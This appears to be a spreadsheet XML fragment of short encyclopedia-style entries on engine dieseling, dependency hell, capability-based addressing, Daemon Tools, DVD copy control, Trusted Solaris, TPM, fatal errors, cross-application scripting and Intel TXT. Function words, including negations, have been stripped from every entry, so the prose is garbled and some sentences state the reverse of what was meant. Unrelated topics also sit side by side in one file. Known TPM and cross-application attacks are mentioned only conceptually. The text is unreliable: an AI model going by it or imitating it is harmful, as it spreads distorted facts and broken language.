    <t>dieseling engine run-on condition occur spark-plug-ignited, gasoline powered internal combustion engines, whereby engine keeps running short period turned off, drawing fuel carburetor, engine igniting without spark. dieseling named similar effect diesel engines operate: firing without spark. ignition source diesel engine heat generated compression cylinder, rather spark gasoline engines. dieseling phenomenon occurs compression ratio sufficient cause auto-ignition fuel, also spot inside cylinder (spark plug electrode, combustion-chamber/valve edge even excess carbon) starts combustion. automobile engine dieseling typically sputter, gradually stop. this normally seen carbureted engines many miles them. dieseling nearly common was, commonly occurs engines equipped carburetors. vast majority vehicles manufactured 1987 fuel-injected: injectors high-pressure fuel pump immediately cease supplying fuel cylinders ignition switched off. injector damaged dirty, small amount fuel enter chamber ignited, causing sputter engine switched off. until mass-market introduction fuel injection, industry's remedy dieseling install electric solenoid fuel supply circuit carburetor, energized ignition coil primary wire: activated, solenoid would open allow fuel flow normally float bowl, fuel-metering jets engine; deactivated, solenoid would close prevent fuel drawn jets engine. this provided simple, adequate solution dieseling problem. dieseling sense engine run-on, disregarding combustible gaseous mixtures intake) also occur diesel engines, piston seals fail overheating, admitting engine cylinder. structurally failing diesel engine often accelerate throttle released, even fuel injection switched off. some carbureted engines low-pressure fuel pumps: typically designed overcome loss suction fuel line near engine fuel evaporation weather, supply sufficient fuel maintain stoichiometric combustion heavy load wide-open throttle, combination two. fuel demand idle enough manifold vacuum draw sufficient fuel combustion, even fuel pump switched off. gasoline engines much smaller typical automotive engine usually carbureted economic engineering reasons. dieseling occur engines. these engines include installed small generators, mopeds, scooters, small motorcycles, all-terrain vehicles, lawn garden power tools. potential causes dieseling occur several reasons: built-up carbon ignition chamber glow engine off, providing mechanism igniting unburnt fuel. such thing happen engine runs rich, depositing unspent fuel particles pistons valves. similarly, rough metal regions within piston chamber cause problem, since glow red. also suggested improperly rated spark plug retain heat cause problem. carburetor completely close contribute running engine off, since extra fuel oxygen mixture combust easily warm piston chamber. similarly, vaporized gases engine crankcase provide ample fuel dieseling. incorrect timing. engine runs lean produce environment conducive allowing unspent fuel burn. idle speed fast leave engine much angular momentum upon shutdown, raising chances engine turn burn fuel lock cycle continuous running. another potential "run problem ignition turned attributed inlet valves sealing fully allowing piston motion pull fuel mixture technically valve shut. rifles term also used refer deliberate accidental burning oils similar flammable hydrocarbons rifle discharged. spring ram-powered rifle works piston rapidly compressing chamber behind projectile forcing projectile (usually pellet) speed. where contains flammable contaminants additions, temperature rise associated compression ignite mixture similar fuel diesel engine. this adds energy system, transferred pellet increased velocity. owing relatively small muzzle energy rifles compared stored chemical energy oil, dieseling make substantial difference velocity pellet. while generally unwanted phenomenon effect accuracy also potential damage rifle sight, sometimes deliberately engineered oiling pellet chamber, order increase power weapon. this normally done stunt experimentation tiny amounts involved makes consistency impractical, consequent substantial adverse effect accuracy. references dieseling spark-ignition engines external links engine run-on, dieseling dieseling shut-off talk 2017 what causes dieseling "after-running" what airgun dieseling dangerous really</t>
  </si>
  <si>
    <t>Dependency hell</t>
  </si>
  <si>
    <t>dependency hell colloquial term frustration software users installed software packages dependencies specific versions software packages.the dependency issue arises several packages dependencies shared packages libraries, depend different incompatible versions shared packages. shared package library installed single version, user need address problem obtaining newer older versions dependent packages. this, turn, break dependencies push problem another packages. problems dependency hell takes several forms: many dependencies application depends many libraries, requiring lengthy downloads, large amounts disk space, portable (all libraries already ported enabling application ported easily). also difficult locate dependencies, fixed repository (see below). this partly inevitable; application built given computing platform (such java) requires platform installed, applications require this particular problem application uses small part library (which solved code refactoring), simple application relies many libraries. long chains dependencies depends liba, depends libb, ..., depends libz. this distinct "many dependencies" dependencies must resolved manually (e.g., attempting install app, user prompted install liba first. attempting install liba, user prompted install libb, on.). sometimes, however, long chain dependencies, conflicts arise different versions package required (see conflicting dependencies below). these long chains dependencies solved package manager resolves dependencies automatically. other hassle resolve dependencies manually), manual resolution mask dependency cycles conflicts. conflicting dependencies solving dependencies software break compatibility another similar fashion whack-a-mole. app1 depends libfoo 1.2, app2 depends libfoo 1.3, different versions libfoo cannot simultaneously installed, app1 app2 cannot simultaneously used installed, installer checks dependencies). when possible, solved allowing simultaneous installations different dependencies. alternatively, existing dependency, along software depends must uninstalled order install dependency. problem linux systems installing packages different distributor (which recommended even supposed work) resulting long chain dependencies lead conflicting version standard library (e.g. library), thousands packages depend. happens, user prompted uninstall packages. circular dependencies application depends upon can't without specific version application application turn, depends upon can't without specific version application upgrading application break another. this scheme deeper branching. impact quite heavy, affects core systems update software itself: package manager (a), requires specific run-time library function, brick middle process upgrading library next version. incorrect library version, package manager broken- thus rollback downgrade library possible. usual solution download deploy applications, sometimes within temporary environment. package manager dependencies possible dependency hell result installing prepared package package manager (e.g. apt), unlikely since major package managers matured official repositories well maintained. this case current releases debian major derivatives ubuntu. dependency hell, however, result installing package directly package installer (e.g. dpkg). diamond dependency when library depends libraries depend library requires version requires version d.2. build fails version exist final executable. package managers like yum, prone conflicts packages repositories, causing dependency hell linux distributions centos enterprise linux. solutions version numbering common solution problem standardized numbering system, wherein software uses specific number version (aka major version), also subnumber revision (aka minor version), e.g.: 10.1, 5.7. major version changes programs used version longer compatible. minor version might change even simple revision prevent software working cases like this, software packages simply request component particular major version, minor version (greater equal particular minor version). such, continue work, dependencies resolved successfully, even minor version changes. semantic versioning (aka "semver") example effort generate technical specification employs specifically formatted numbers create software versioning scheme. private application versions windows file protection introduced windows 2000 prevented applications overwriting system dlls. developers instead encouraged "private dlls", copies libraries application directory application. this uses windows search path characteristic local path always prioritized system directory system wide libraries. this allows easy effective shadowing library versions specific application ones, therefore preventing dependency hell. pc-bsd, including version 8.2, predecessor trueos operating system based freebsd) places packages dependencies self-contained directories /programs, avoids breakage system libraries upgraded changed. uses "pbi" (push button installer) package management. side-by-side installation multiple versions version numbering solution improved upon elevating version numbering operating system supported feature. this allows application request module/library unique name version number constraints, effectively transferring responsibility brokering library/module versions applications operating system. shared module placed central repository without risk breaking applications dependent previous later versions module. each version gets entry, side side versions module. this solution used microsoft windows operating systems since windows vista, global assembly cache implementation central registry associated services integrated installation system/package manager. gentoo linux solves problem concept called slotting, allows multiple versions shared libraries installed. smart package management some package managers perform smart upgrades, interdependent software components upgraded time, thereby resolving major number incompatibility issue too. many current linux distributions also implemented repository-based package management systems solve dependency problem. these systems layer rpm, dpkg, packaging systems designed automatically resolve dependencies searching predefined software repositories. examples systems include apt, yum, urpmi, zypp, portage, pacman others. typically, software repositories sites websites, directories local computer shared across network much less commonly, directories removable media dvds. this eliminates dependency hell software packaged repositories, typically maintained linux distribution provider mirrored worldwide. although repositories often huge, possible every piece software them, dependency hell still occur. cases, dependency hell still faced repository maintainers. installer options because different pieces software different dependencies, possible vicious circle dependency requirements, ever-expanding tree requirements, package demands several installed. systems debian's advanced packaging tool resolve presenting user range solutions, allowing user accept reject solutions, desired. easy adaptability programming application software designed programmers able easily adapt interface layer deals window manager desktop environment changing standards, programmers would monitor notifications environment creators component library designers quickly adjust software updates users, minimal effort lack costly time-consuming redesign. this method would encourage programmers pressure upon depend maintain reasonable notification process onerous anyone involved. strict compatibility requirement code development maintenance applications libraries developed maintained guaranteed downward compatibility mind, application library replaced newer version time without breaking anything. while alleviate multitude dependency, make jobs package managers installers much easier. software appliances another approach avoiding dependency issues deploy applications software appliance. software appliance encapsulates dependencies pre-integrated self-contained unit users longer worry resolving software dependencies. instead burden shifted developers software appliance. portable applications application version existing conventional application) completely self-contained requires nothing already installed. coded necessary components included, designed keep necessary files within directory, create dependency problem. these often able independently system connected. applications risc desktop linux application directories, work much way: programs dependencies self-contained directories (folders). this method distribution also proven useful porting applications designed unix-like platforms windows, noticeable drawback multiple installations shared libraries. example, windows installers gedit, gimp, hexchat include identical copies toolkit, programs render widgets. hand, different versions required application, correct behavior successfully avoids dependency hell. platform-specific specific computing platforms, "dependency hell" often goes local specific name, generally name components. hell form dependency hell occurring microsoft windows. extension conflict form dependency hell occurring classic hell form dependency hell occurring java runtime environment build tools like apache maven solved problem 2004. hell form dependency hell occurring distribution linux distributions package manager. also catch-22 literary depiction situations something depends negation configuration management techniques tools managing software versions coupling forms dependency among software artifacts dynamic dead code elimination package manager software appliance package manager left-pad references external links context independence dependency walker implicit dependency macdependency</t>
  </si>
  <si>
    <t>Capability-based addressing</t>
  </si>
  <si>
    <t>computer science, capability-based addressing scheme used computers control access memory efficient implementation capability-based security. under capability-based addressing scheme, pointers replaced protected objects (called capabilities) created privileged instructions executed either kernel privileged process authorised this effectively allows kernel control processes access objects memory without need separate address spaces therefore requiring context switch access occurs. practical implementations techniques available implementation: require capabilities stored particular area memory cannot written process them. example, plessey system required capabilities stored capability-list segments. extend memory additional bit, writable supervisor mode, indicates particular location capability. this generalization bits protect segment descriptors burroughs large systems, used protect capabilities system/38.the designers system/38's descendent systems, including as/400 removed capability-based addressing. reason given decision could find revoke capabilities (although patterns implementing revocation capability systems published early 1974, even introduction system/38). chronology systems adopting capability-based addressing 1969: system plessey company 1970–77: computer university cambridge computer laboratory 1978: system/38 1980: flex machine royal signals radar establishment (rsre) malvern 1981: intel iapx intel 2014: cheri 2020: chex86 2022: morello notes references fabry, (1974). "capability-based addressing". communications acm. (7): 403–412. doi:10.1145/361011.361070. s2cid 5702682. wulf, cohen, corwin, jones, levin, pierson, pollack, (june 1974). "hydra: kernel multiprocessor operating system". communications acm. (6): 337–345. doi:10.1145/355616.364017. issn 0001-0782. s2cid 8011765. denning, (december 1976). "fault tolerant operating systems". computing surveys. (4): 359–389. doi:10.1145/356678.356680. issn 0360-0300. s2cid 207736773. levy, henry (1984). capability-based computer systems. maynard, mass: digital press. isbn 978-0-932376-22-0. linden, theodore (december 1976). "operating system structures support security reliable software". computing surveys. (4): 409–445. doi:10.1145/356678.356682. hdl:2027/mdp.39015086560037. issn 0360-0300. s2cid 16720589. viktors berstis, security protection data system/38, proceedings annual symposium computer architecture, 245-252, 6–08, 1980, baule, united states david sincoskie, david farber: sods/os: distributed operating system series/1. operating systems review 14(3): 46-54 (july 1980) myers, buckingham, hardware implementation capability-based addressing, sigops operating systems review, v.14 n.4, 13-25, october 1980 houdek, soltis, hoffman, 1981. system/38 support capability-based addressing. proceedings international symposium computer architecture. acm/ieee, 341–348. cambridge computer, levy, 1988 plessey system 250, commercial capability solution, hank levy, 1988 buzzard, mudge (1983) object-based computer systems programming language [2]. university michigan computer research laboratory robotics research laboratory department electrical computer engineering external links spread capability approach". cap-talk (mailing list). archived original 2013-04-14. retrieved 2007-07-16.</t>
  </si>
  <si>
    <t>Daemon Tools</t>
  </si>
  <si>
    <t>daemon tools virtual drive optical disc authoring program microsoft windows overview daemon tools originally successor generic safedisc emulator incorporated features. program claims able defeat copy protection schemes safedisc securom. currently compatible windows windows vista, windows windows windows daemon tools special mode proper operation copies discs advanced protection (safedisc, securom laserlock, cdcops, starforce protect cd), used discs games. editions editions product exist: ultra, lite, standard, advanced, mac. feature comparison given below. also, company provides additional solutions data storage organization: daemon tools allows sharing different types devices remote workstations daemon tools iscsi target cross-platform solution enables creating iscsi storage server provides access virtual physical devices, along images, within home corporate network. notes free non-commercial without technical support. technical support right commercially purchased. korea, freemium license available since ver. 4.45.1. applies .mds .mdx images. supported output formats include .iso, .mds/.mdf .mdx ability split image files multiple files fxed maximum sizes. supported daemon tools lite, february 2012. ability mount image folder ntfs drive file format default file format daemon tools media data extended (mdx). disc image file format similar mds/mdf images. supports mds/mdf format features except data monolithic file only. files types bear filename extension .mdx.mdx file contains metadata original media specifically main physical parameters disc, layer breaks, sessions, tracks other. could described archive file containing data cd/dvd. also supports data compression. file includes magic number "media descriptor" beginning file. controversy february 2012, daemon tools components known mountspace became subject privacy concerns. mountspace, service-oriented component gathers sends information disc images used daemon tools mountspace.com along users' addresses. although mountspace disabled installation, criticized transmitting information despite disabled lacking privacy policy. initial discovery concerning issue attributed rafael rivera within windows blog. related programs y.a.s.u. yasu (yet another securom utility) small tool works scsi-drive protector. created syk0 used hide emulated drives securom safedisc yasu companion program daemon tools currently hosted, supported maintained daemon tools team. march 2009, syk0 announced development omen succeed development yasu. january 2010, development omen abandoned. also comparison disc image software scsi pass-through direct (sptd) references further reading external links official website</t>
  </si>
  <si>
    <t>DVD Copy Control Association</t>
  </si>
  <si>
    <t>copy control association (dvd cca) organization primarily responsible copy protection dvds. content scramble system (css) devised purpose make copyright infringement difficult, also presents obstacles legitimate uses media. association also responsible controversial regional playback control (rpc), region encoding scheme gives movie studios geographic control distribution. 2001, members included film distributors metro-goldwyn-mayer, twentieth century warner bros.they filed much publicized case versus johansen alleged wrote decss. case dropped january 2004. decrypting software (such decrypter, anydvd, shrink) allows region-specific copied all-region dvd. also removes macrovision, css, region codes, user operation prohibitions. they also filed suit bunner people distributed decss, seeking injunctions stop distribution based trade secret claims. injunction eventually denied longer secret time litigation occurred. features restricted manufacturers hardware manufacturers (especially player/burner manufacturers) implement cca-mandated enforcement features products (which three restrictions content scramble system); even beyond implement additional features restrict ripping, example: riplock: many manufacturers artificial limit, lock, ripping speeds. some drives alternative 3rd-party firmware removed enable faster ripping. rpc-1 firmware site example. bitsetting/booktyping: feature makes dvd+rs readable older players play dvd-roms only. some manufacturers disable feature drives. again, alternative 3rd-party firmware enable burned dvds appear dvd-roms playable older players. also blu-ray region code blu-ray, successor copy control ass'n, inc. bunner universal city studios, inc. reimerdes copy control ass'n, inc. kaleidescape, inc. realnetworks, inc. copy control ass'n, inc. references external links</t>
  </si>
  <si>
    <t>Trusted Solaris</t>
  </si>
  <si>
    <t>trusted solaris discontinued security-evaluated operating system based solaris microsystems, featuring mandatory access control model. features accounting role-based access control auditing device allocation mandatory access control (mac) labeling certification trusted solaris common criteria certified evaluation assurance level eal4+ capp, rbacpp, lspp protection profiles. basis dodiis trusted workstation program. solaris trusted extensions features previously available trusted solaris, fine-grained privileges, part standard solaris release. solaris 11/06 update component called solaris trusted extensions introduced, making longer necessary different release modified kernel labeled security environments. solaris trusted extensions opensolaris project. solaris trusted extensions, enabled, enforces mandatory access control policy aspects operating system, including device access, file, networking, print window management services. this achieved adding sensitivity labels objects, thereby establishing explicit relationships objects. only appropriate (and explicit) authorization allows applications users read and/or write access objects. component also provides labeled security features desktop environment. apart extending support common desktop environment trusted solaris release, delivered first labeled environment based gnome. solaris trusted extensions facilitates access data multiple classification levels single desktop environment. solaris trusted extensions also implements labeled device access labeled network communication, commercial internet protocol security option (cipso) standard. cipso used pass security information within labeled zones. solaris trusted extensions complies federal information processing standards (fips). references external links official website solaris trusted extensions (opensolaris) wayback machine (archived 2012-12-09)</t>
  </si>
  <si>
    <t>Trusted Platform Module</t>
  </si>
  <si>
    <t>trusted platform module (tpm, also known iso/iec 11889) international standard secure cryptoprocessor, dedicated microcontroller designed secure hardware integrated cryptographic keys. term also refer chip conforming standard. used digital rights management (drm), windows defender, windows domain logon, protection enforcement software licenses, prevention cheating online games.one windows 11's system requirements 2.0. microsoft stated help increase security firmware ransomware attacks. history trusted platform module (tpm) conceived computer industry consortium called trusted computing group (tcg), evolved main specification version standardized international organization standardization (iso) international electrotechnical commission (iec) 2009 iso/iec 11889:2009. main specification version finalized march 2011, completing revision.on april 2014 trusted computing group announced major upgrade specification entitled library specification 2.0. group continues work standard incorporating errata, algorithmic additions commands, recent edition published november 2019. this version became iso/iec 11889:2015. when revision released divided multiple parts trusted computing group. each part consists document makes whole specification. part architecture (renamed design principles) part structures part commands part supporting routines (added 2.0) overview trusted platform module provides hardware random number generator facilities secure generation cryptographic keys limited uses. remote attestation: creates nearly unforgeable hash summary hardware software configuration. could hash verify hardware software changed. software charge hashing setup determines extent summary. binding: encrypts data using bind key, unique descended storage key. computers incorporate create cryptographic keys encrypt decrypted tpm. this process, often called wrapping binding key, help protect disclosure. each master wrapping key, called storage root key, stored within itself. user-level containers stored windows user profile particular user used encrypt decrypt information applications specific user identity. sealing: similar binding, addition, specifies state data decrypted (unsealed). other trusted computing functions data decrypted (unsealed).computer programs authenticate hardware devices, since chip unique secret endorsement (ek) burned produced. security embedded hardware provides protection software-only solution. restricted countries. uses platform integrity primary scope ensure integrity platform. context, "integrity" means "behave intended", "platform" computer device regardless operating system. this ensure boot process starts trusted combination hardware software, continues operating system fully booted applications running. when used, firmware operating system responsible ensuring integrity. example, unified extensible firmware interface (uefi) form root trust: contains several platform configuration registers (pcrs) allow secure storage reporting security-relevant metrics. these metrics used detect changes previous configurations decide proceed. examples found linux unified setup (luks), bitlocker privatecore vcage memory encryption. (see below.) another example platform integrity microsoft office licensing outlook exchange.an example platform integrity trusted execution technology (txt), creates chain trust. could remotely attest computer using specified hardware software. disk encryption full disk encryption utilities, dm-crypt bitlocker, technology protect keys used encrypt computer's storage devices provide integrity authentication trusted boot pathway includes firmware boot sector. other uses concerns application chip for: digital rights management (drm) windows defender windows domain logon protection enforcement software licenses prevention cheating online gamesother uses exist, give rise privacy concerns. "physical presence" feature addresses concerns requiring bios-level confirmation operations activating, deactivating, clearing changing ownership someone physically present console machine. organizations united states department defense (dod) specifies "new computer assets (e.g., server, desktop, laptop, thin client, tablet, smartphone, personal digital assistant, mobile phone) procured support include version higher required defense information systems agency (disa) security technical implementation guides (stigs) technology available." anticipates used device identification, authentication, encryption, device integrity verification. implementations 2006, laptops began sold built-in chip. future, concept could co-located existing motherboard chip computers, device facilities could employed, cellphone. either used connect chip. trusted computing group (tcg) certified chips manufactured infineon technologies, nuvoton, stmicroelectronics, assigned vendor advanced micro devices, atmel, broadcom, ibm, infineon, intel, lenovo, national semiconductor, nationz technologies, nuvoton, qualcomm, rockchip, standard microsystems corporation, stmicroelectronics, samsung, sinosun, texas instruments, winbond.there five different types implementations (listed order least secure): discrete tpms dedicated chips implement functionality tamper resistant semiconductor package. they theoretically secure type routines implemented hardware resistant bugs versus routines implemented software, packages required implement tamper resistance. example brake controller car, hacked sophisticated methods. integrated tpms part another chip. while hardware resists software bugs, required implement tamper resistance. intel integrated tpms chipsets. firmware tpms (ftpms) firmware-based (e.g. uefi) solutions cpu's trusted execution environment. intel, qualcomm implemented firmware tpms. hypervisor tpms (vtpms) virtual tpms provided rely hypervisors, isolated execution environment hidden software running inside virtual machines secure code software virtual machines. they provide security level comparable firmware tpm. google cloud platform implemented vtpm. software tpms software emulators tpms protection regular program gets within operating system. they depend entirely environment provide security provided normal execution environment, vulnerable software bugs attacks penetrating normal execution environment. they useful development purposes.the official reference implementation specification developed microsoft. licensed license source code available github. microsoft provides visual studio solution linux autotools build scripts. 2018, intel open-sourced trusted platform module (tpm2) software stack support linux microsoft windows. source code hosted github licensed license.infineon funded development open source middleware complies software stack (tss) enhanced system (esapi) specification tcg. developed fraunhofer institute secure information technology (sit).ibm's software implementation specification. based specification parts source code donated microsoft. contains additional files complete implementation. source code hosted sourceforge github licensed license. 2022, announced certain circumstances ftpm implementation causes performance problems. available form bios-update. versus while addresses many cases similar features, details different. backward compatible 1.2. policy authorization includes hmac, locality, physical presence, pcr. adds authorization based asymmetric digital signature, indirection another authorization secret, counters time limits, nvram values, particular command command parameters, physical presence. permits anding oring authorization primitives construct complex authorization policies. reception faced resistance deployment technology areas, authors possible uses specifically related trusted computing, raise privacy concerns. concerns include abuse remote validation software (where manufacturer‍—‌and user owns computer system‍—‌decides software allowed run) possible ways follow actions taken user recorded database, manner completely undetectable user.the truecrypt disk encryption utility, well derivative veracrypt, support tpm. original truecrypt developers opinion exclusive purpose protect attacks require attacker administrator privileges, physical access computer". attacker physical administrative access computer circumvent tpm, e.g., installing hardware keystroke logger, resetting tpm, capturing memory contents retrieving tpm-issued keys. condemning text goes claim entirely redundant. veracrypt publisher reproduced original allegation changes replacing "truecrypt" "veracrypt". author right that, achieving either unrestricted physical access administrative privileges, matter time security measures place bypassed. however, stopping attacker possession administrative privileges never goals (see uses details), stop physical tampering.in 2015, richard stallman suggested replace term "trusted computing" term "treacherous computing" danger computer made systematically disobey owner cryptographical keys kept secret him. also considers tpms available currently dangerous reason include computer support software failed attempts industry technology drm. attacks 2010, christopher tarnovsky presented attack tpms black briefings, claimed able extract secrets single tpm. able months work inserting probe spying internal infineon pc.in 2015, part snowden revelations, revealed 2010 team claimed internal conference carried differential power analysis attack tpms able extract secrets.in 2018, design flaw specification static root trust measurement (srtm) reported (cve-2018-6622). allows adversary reset forge platform configuration registers designed securely hold measurements software used bootstrapping computer. fixing requires hardware-specific firmware patches. attacker abuses power interrupts state restores trick thinking running non-tampered components.main trusted boot (tboot) distributions november 2017 affected dynamic root trust measurement (drtm) attack cve-2017-16837, affects computers running intel's trusted execution technology (txt) boot-up routine.in case physical access, computers vulnerable cold boot attacks long system booted without passphrase shutdown hibernation, default setup windows computers bitlocker full disk encryption.in 2021, dolos group showed attack discrete tpm, chip tamper resistance, endpoints communication not. they read full-disk-encryption transmitted across motherboard, used decrypt laptop's ssd. 2017 weak generation controversy october 2017, reported code library developed infineon, widespread tpms, contained vulnerability, known roca, generated weak pairs allowed private keys inferred public keys. result, systems depending upon privacy weak keys vulnerable compromise, identity theft spoofing.cryptosystems store encryption keys directly without blinding could particular risk types attacks, passwords factors would meaningless attacks extract encryption secrets.infineon released firmware updates tpms manufacturers used them. availability currently, used nearly notebook manufacturers. implemented several vendors: infineon provides chips software, delivered versions computers well separately infineon products technology comply standards. example, infineon licensed management software broadcom corp. 2004. microchip (formerly atmel) manufactures devices claims compliant trusted platform module specification version revision offered several interfaces (lpc, spi, i2c), modes (fips 140-2 certified standard mode), temperature grades (commercial industrial), packages (tssop qfn). their tpms support embedded devices. they also provides development kits support integration devices various embedded designs. nuvoton technology corporation provides devices applications. nuvoton also provides devices embedded systems internet things (iot) applications host interfaces. nuvoton's complies common criteria (cc) assurance level augmented alc_flr.1, ava_van.4 alc_dvs.2, fips 140-2 level physical security emi/emc level trusted computing group compliance requirements, supported within single device. tpms produced winbond part nuvoton. stmicroelectronics provided tpms platforms embedded systems since 2005. product offering includes discrete devices several interfaces supporting serial peripheral interface (spi) different qualification grades (consumer, industrial automotive). products common criteria (cc) certified eal4+ augmented alc_flr.1 ava_van.5, fips 140-2 level certified physical security level also trusted computing group (tcg) certified.there also hybrid types; example, integrated ethernet controller, thus eliminating need separate motherboard component. field upgrade field upgrade term updating firmware. update 2.0, firmware versions. some vendors limit number transitions 2.0, restrict rollback previous versions. platform oems supply upgrade tool. since july 2016, microsoft device models, lines, series updating hardware configuration existing model, line, series major update, cpu, graphic cards) implement, enable default 2.0. while parts discrete silicon components, typically soldered motherboard, available discrete (dtpm) silicon component single semiconductor package, integrated component incorporated semiconductor packages alongside logic units package(s), firmware (ftpm) based component running trusted execution environment (tee) general purpose system-on-a-chip (soc). virtual google compute engine offers virtualized tpms (vtpms) part google cloud's shielded product. libtpms library provides software emulation trusted platform module (tpm 2.0). targets integration functionality hypervisors, primarily qemu. operating systems windows requires support minimum system requirement. many systems disabled default requires changing settings computer's uefi enable trusted platform module (tpm 2.0) supported linux kernel since version 3.20. platforms google includes tpms chromebooks part security model. oracle ships tpms t-series systems series servers. support included solaris 2006, introduction first macintosh models intel processors, apple started ship macs tpm. apple never provided official driver, port available. apple shipped computer since 2006. 2011, taiwanese manufacturer launched windpad 110w tablet featuring infineon security platform tpm, ships controlling software version 3.7. chip disabled default enabled included, pre-installed software. virtualization vmware esxi hypervisor supported since 4.x, enabled default. hypervisor support virtualized tpms. each guest gets unique, emulated, software tpm. kvm, combined qemu, support virtualized tpms. 2012, supports passing physical chip single dedicated guest. qemu 2.11 released december 2017 also provides emulated tpms guests. software microsoft operating systems windows vista later chip conjunction included disk encryption component named bitlocker. microsoft announced january 2015, computers equipped module order pass windows hardware certification. however, december 2014 review windows certification program instead made optional requirement. however, required connected standby systems. virtual machines running hyper-v virtual module starting windows 1511 windows server 2016. microsoft windows includes related commands: tpmtool, utility used retrieve information tpm, tpmvscmgr, command-line tool allows creating deleting virtual smart cards computer. endorsement keys endorsement keys (eks) asymmetric pairs unique tpm. they algorithms. manufacturer usually provisions endorsement certificates non-volatile memory. certificates assert authentic. starting 2.0, certificates x.509 format. these manufacturers typically provide certificate authority root (and sometimes intermediate) certificates sites. infineon intel nationz nuvoton micro software libraries utilize tpm, user needs software library communicates provides friendlier communication. currently, several open-source libraries. some also support 1.2, mostly chips deprecated modern development focused 2.0. typically, library provides one-to-one mappings commands. specification calls layer system api(sapi). this user control operations, however complexity high. hide complexity libraries also offer simpler ways invoke complex operations. specification call layers enhanced system api(esapi) feature api(fapi). there currently stack follows specification. available open-source libraries form richer api. there separate project called "charra" fraunhofer uses tpm2-tss library remote attestation. stacks accompanying attestation servers directly include examples attestation. offer open-source remote attestation server called "ibm acs" sourceforge google "go-attestation" available github, "wolftpm" offers time local attestation examples directly open-source code, also github. (**) there application note example project aurix 32-bit using tpm2-tss library. (***) requires additional libraries (dotnet) linux. these libraries sometimes also called stacks, provide interface developer user interact tpm. seen table, stacks abstract operating system transport layer, user could migrate application platforms. example, using stack user would interact tpm, regardless physical chip connected spi, interface host system. developer communities increasing relevance computer security especially hardware-backed security made potential popular among developers users. there several developer communities around using tpm. tpm.dev this community forum-like platform sharing information asking questions. platform, finds articles video tutorials community members guests. there regular weekly online call. main focus community lowering barrier adoption existing software libraries. specific focus remote attestation trusted applications. tpm2-software this community centered around tpm2-tss library. community engages developing related software found github account. there also tutorials external section links conference talks presentations. nominally addressing discussions relate general application development. software nominally addressing implementation software 2.0, discussions relate general application development. nokia attestation engine open-source remote attestation server research project designed communicate (theoretically) attestatable element, 2.0, enclave, containers etc. keylime project open-source project uses boot runtime attestation computers devices. linux security mailing list linux-integrity@vger.kernel.org high volume mailing list. appropriate device driver issues general how-to questions. also platform security processor trustzone crypto-shredding hardware security hardware security module hengzhi chip intel management engine microsoft pluton next-generation secure computing base threat model references further reading</t>
  </si>
  <si>
    <t>Critical error</t>
  </si>
  <si>
    <t>computing, fatal exception error fatal error error causes program abort therefore return user operating system. when happens, data program processing lost. fatal error usually distinguished fatal system error (colloquially referred windows operating systems error message produces "blue screen death"). fatal error occurs typically following cases: illegal instruction attempted invalid data code accessed operation allowed current ring mode program attempts divide zero (only integers; ieee floating point standard, creates infinity instead).in systems, macos microsoft windows, fatal error causes operating system create entry save image (core dump) process. references external links what fatal exception errors microsoft knowledge base</t>
  </si>
  <si>
    <t>Critical security parameter</t>
  </si>
  <si>
    <t>cryptography, critical security parameter (csp) information either user system defined used operate cryptography module processing encryption functions including cryptographic keys authentication data, passwords, disclosure modification compromise security cryptographic module security information protected module. references</t>
  </si>
  <si>
    <t>Cross-application scripting</t>
  </si>
  <si>
    <t>cross-application scripting (cas) vulnerability affecting desktop applications check input exhaustive way. allows attacker insert data modifies behaviour particular desktop application. this makes possible extract data inside users' systems. attackers gain full privileges attacked application exploiting vulnerabilities; attack degree independent underlying operating system hardware architecture. initially discovered emanuele gentili presented researchers (alessandro scoscia emanuele acri) participated study technique implications, presented first time security summit 2010 milan.the format string attack similar concept attack could considered generalization attack method. some aspects technique previously demonstrated clickjacking techniques. concept like interfaces, modern frameworks realization graphical applications particular gtk+ allow tags inside widgets. attacker gains possibility inject tags, gains ability manipulate appearance behaviour application. exactly phenomenon seen cross-site scripting (xss) pages, kind behavior named cross-application scripting (cas). typically desktop applications considerable amount input support large number features, certainly interface. this makes harder developer check whether input program might untrusted sources filtered correctly. cross-application request forgery cross-application scripting application equivalent applications, cross-application request forgery (carf) equivalent cross-site request forgery (csrf) desktop applications. carf concept “link” “protocol” inherited extended involves components graphical environment and, cases, operating system. exploiting vulnerabilities amenable csrf requires interaction user. this requirement particularly limiting user easily execute certain actions graphical interface altered right way. many misleading changes look applications obtained cas: kind “phishing”, whose dangerousness amplified lack tools detect kind attack outside websites emails. contrast techniques, manipulate later execute commands users' browser, possible talk directly operating system, graphical interface. references</t>
  </si>
  <si>
    <t>Trusted Execution Technology</t>
  </si>
  <si>
    <t>intel trusted execution technology (intel txt, formerly known lagrande technology) computer hardware technology whose primary goals are: attestation authenticity platform operating system. assuring authentic operating system starts trusted environment, considered trusted. provision trusted operating system additional security capabilities available unproven one.intel uses trusted platform module (tpm) cryptographic techniques provide measurements software platform components system software well local remote management applications measurements make trust decisions. complements intel management engine. this technology based industry initiative trusted computing group (tcg) promote safer computing. defends software-based attacks aimed stealing sensitive information corrupting system bios code, modifying platform's configuration. details trusted platform module (tpm) specified provides many security functions including special registers (called platform configuration registers pcrs) hold various measurements shielded location manner prevents spoofing. measurements consist cryptographic hash using secure hashing algorithm (sha); v1.0 specification uses sha-1 hashing algorithm. more recent versions (v2.0+) call sha-2.a desired characteristic cryptographic hash algorithm (for practical purposes) hash result (referred hash digest hash) modules produce hash value modules identical. measurements measurements code, data structures, configuration, information, anything loaded memory. requires code executed measured. ensure particular sequence measurements, hash measurements sequence written different pcrs, rather "extended" measurement. this means takes current value measurement extended, hashes together, replaces content hash result. effect arrive particular measurement extend exactly measurements exactly order. therefore, module measured modified, resulting measurement different thus easy detect code, configuration, data, etc. measured altered corrupted. extension mechanism crucial establishing chain trust layers software (see below). chain trust technology supports static chain trust dynamic chain trust. static chain trust starts platform powers platform reset), resets pcrs default value. server platforms, first measurement made hardware (i.e., processor) measure digitally signed module (called authenticated code module acm) provided chipset manufacturer. processor validates signature integrity signed module executing measures first bios code module, make additional measurements. measurements bios code modules extended pcr0, said hold static core root trust measurement (crtm) well measurement bios trusted computing base (tcb). bios measures additional components pcrs follows: pcr0 crtm, bios code, host platform extensions pcr1 host platform configuration pcr2 option code pcr3 option configuration data pcr4 (initial program loader) code (usually master boot record mbr) pcr5 code configuration data (for code) pcr6 state transition wake events pcr7 host platform manufacturer controlthe dynamic chain trust starts operating system invokes special security instruction, resets dynamic pcrs (pcr17–22) default value starts measured launch. first dynamic measurement made hardware (i.e., processor) measure another digitally signed module (referred sinit acm) also provided chipset manufacturer whose signature integrity verified processor. this known dynamic root trust measurement 